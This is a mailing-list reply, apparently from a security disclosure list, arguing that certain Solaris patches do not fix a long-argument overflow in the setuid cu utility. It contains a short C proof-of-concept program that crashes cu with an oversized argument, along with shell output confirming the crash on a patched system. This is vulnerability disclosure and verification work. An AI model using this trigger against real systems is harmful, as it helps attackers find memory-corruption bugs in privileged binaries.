hal King <[EMAIL PROTECTED]> writes:
> In Solaris 2.6 patch 106468-02 replaces cu in Sol 7 patch 108372-01 replaces
> it for gets() use. The script does SegFault in 8, but no core file... I am
> running 10/2000 revision and 108372 came out in may, so it's probably cool.
Are you implying the above patches fix the cu long hardlink name
vulnerability? This is not the case, at least on 2.6:
# cat > cu_exploit.c
#include <stdio.h>
void main(int argc,char **argv)
{
char *buf;
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/usr/bin/cu",buf,(char *)0);
}
# gcc cu_exploit.c
cu_exploit.c: In function `main':
cu_exploit.c:4: warning: return type of `main' is not `int'
# a.out
Segmentation fault
# uname -a
SunOS shell1 5.6 Generic_105181-23 sun4m sparc SUNW,SPARCstation-5
# showrev -p | fgrep 106468-02
Patch: 106468-02 Obsoletes: Requires: Incompatibles: Packages: SUNWbnuu
# pkgchk -p /usr/bin/cu
ERROR: /usr/bin/cu
permissions <4111> expected <0111> actual
106468-02 was a patch from last summer, fixing an unspecified (but
presumably different) security problem in cu and uustat.
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
[EMAIL PROTECTED] | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.
